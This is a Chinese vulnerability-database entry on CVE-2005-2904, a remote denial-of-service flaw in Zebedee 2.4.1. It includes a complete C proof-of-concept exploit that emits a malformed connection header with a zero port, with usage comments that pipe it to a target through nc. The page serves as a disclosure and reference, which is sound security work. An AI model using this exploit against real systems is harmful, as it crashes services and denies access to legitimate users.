Zebedee远程拒绝服务漏洞

Zebedee远程拒绝服务漏洞

漏洞ID 1109060 漏洞类型 其他
发布时间 2005-09-09 更新时间 2005-10-20
图片[1]-Zebedee远程拒绝服务漏洞-安全小百科CVE编号 CVE-2005-2904
图片[2]-Zebedee远程拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200509-114
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26249
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-114
|漏洞详情
Zebedee是一个简单的工具软件,它可以为两个系统间建立一个加密、压缩的TCP/IP,UDP通道。Zebedee2.4.1当未设置”允许重定向端口”时,远程攻击者可以通过协议选项头的端口编号包含的零来引起拒绝服务(应用程序崩溃)攻击,从而触发zebedee.c的makeConnection函数的声明错误。
|漏洞EXP
source: http://www.securityfocus.com/bid/14796/info

A remote denial of service vulnerability affects Zebedee. This issue is due to a failure of the application to properly handle exceptional network requests.

Specifically, Zebedee is unable to handle requests for connections that contain a zero for the requested destination port.

A remote attacker may leverage this issue to crash the affected application, denying service to legitimate users.

Zebedee version 2.4.1 is reported vulnerable to this issue; other versions may also be affected.

/*
        $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
        $ ./mkZebedeeDoS > zebedeeDoS
        $ nc targethost port < zebedeeDoS
*/

#include <stdio.h>

int main (int argc, char **argv)
{

        int i, size;

        char data[] = {
        0x02, 0x01, // protocol version
        0x00, 0x00, // flags
        0x20, 0x00, // max message size
        0x00, 0x06, // compression info
        0x00, 0x00, // port request: value = 0x0
        0x00, 0x80, // key length
        0xff, 0xff, 0xff, 0xff, // key token
        0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
        0x00, 0x00, 0x00, 0x00 // target host address
         };

        size = 28;
        for(i=0; i<size; i++){
                printf("%c", data[i]);
        }

        return 0;

}
|参考资料

来源:BID
名称:14796
链接:http://www.securityfocus.com/bid/14796
来源:SECUNIA
名称:16788
链接:http://secunia.com/advisories/16788/
来源:BUGTRAQ
名称:20050909ZebedeeDoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112629543605488&w;=2
来源:GENTOO
名称:GLSA-200509-14
链接:http://www.gentoo.org/security/en/glsa/glsa-200509-14.xml

相关推荐: SafeHTML Multiple HTML Entity Bypass Vulnerabilities

SafeHTML Multiple HTML Entity Bypass Vulnerabilities 漏洞ID 1097036 漏洞类型 Input Validation Error 发布时间 2005-02-28 更新时间 2005-02-28 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享